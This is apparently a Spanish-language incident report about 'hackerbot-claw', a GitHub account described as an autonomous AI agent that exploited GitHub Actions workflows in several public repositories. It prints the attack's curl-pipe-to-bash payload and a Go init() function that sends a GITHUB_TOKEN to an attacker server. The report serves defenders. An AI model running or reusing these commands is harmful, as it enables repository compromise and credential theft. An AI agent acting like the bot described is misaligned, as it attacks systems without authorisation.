Hackerbot-Claw: Bot de IA que explota flujos de trabajo de GitHub Actions

Detalles de la campaña de ataque

Entre el 21 y el 28 de febrero de 2026, una cuenta de GitHub llamada hackerbot-claw escaneó sistemáticamente repositorios públicos en busca de flujos de trabajo de GitHub Actions explotables. La cuenta se describe a sí misma como un "agente de investigación de seguridad autónomo impulsado por claude-opus-4-5" y solicita donaciones en criptomonedas.

Durante 7 días, realizó lo siguiente:

• Atacó al menos 6 repositorios pertenecientes a Microsoft, DataDog, el CNCF y proyectos populares de código abierto
• Abrió más de 12 solicitudes de extracción y activó flujos de trabajo en los objetivos
• Logró la ejecución arbitraria de código en al menos 4 de ellos
• Exfiltró un GITHUB_TOKEN con permisos de escritura a un servidor externo

Objetivos y metodología

Los objetivos incluyeron:

• microsoft/ai-discovery-agent
• DataDog/datadog-iac-scanner
• avelino/awesome-go (más de 140k estrellas)
• ambient-code/platform
• project-akri/akri (un proyecto de CNCF)

Cada ataque entregó la misma carga útil: curl -sSfL hackmoltrepeat.com/molt | bash, pero cada uno utilizó una técnica completamente diferente para lograr su ejecución.

El README del bot revela su metodología: carga un "índice de patrones de vulnerabilidad" con 9 clases y 47 subpatrones, luego escanea, verifica y despliega pruebas de concepto de manera autónoma. Su registro de "Actividad Reciente" muestra 5 sesiones exitosas en los 2 días previos al análisis.

Ataque 1: avelino/awesome-go - Robo de token mediante script de Go envenenado

El ataque más dañino de la campaña explotó la clásica vulnerabilidad "Pwn Request": un flujo de trabajo pull_request_target que extrae código no confiable de una bifurcación y lo ejecuta.

Flujo de trabajo objetivo: PR Quality Checks - se activa automáticamente en cada solicitud de extracción, extrae el código del autor de la solicitud y ejecuta go run ./.github/scripts/check-quality/.

El ataque: El atacante inyectó una función init() de Go en el script de verificación de calidad. En Go, init() se ejecuta automáticamente antes de main(), por lo que el código malicioso se ejecuta antes de cualquier verificación legítima.

En el intento final y más peligroso (PR #6069), la carga útil no solo ejecutó comandos arbitrarios, sino que también exfiltró el GITHUB_TOKEN a un servidor externo:

func init() {
    _ = exec.Command("bash", "-c", `curl -s -H "Authorization: Bearer $GITHUB_TOKEN" ` +
    `-d "token=$GITHUB_TOKEN&repo=$GITHUB_REPOSITORY" ` +
    `https://recv.hackmoltrepeat.com/ && ` +
    `curl -sSfL https://hackmoltrepeat.com/molt | bash`).Run()
}

El atacante iteró 6 veces durante 18 horas (PR #6058, #6059, #6060, #6061, #6068, #6069), refinando el enfoque en cada ocasión. Los primeros 4 intentos fallaron debido a problemas con git fetch, pero los intentos 5 y 6 tuvieron éxito.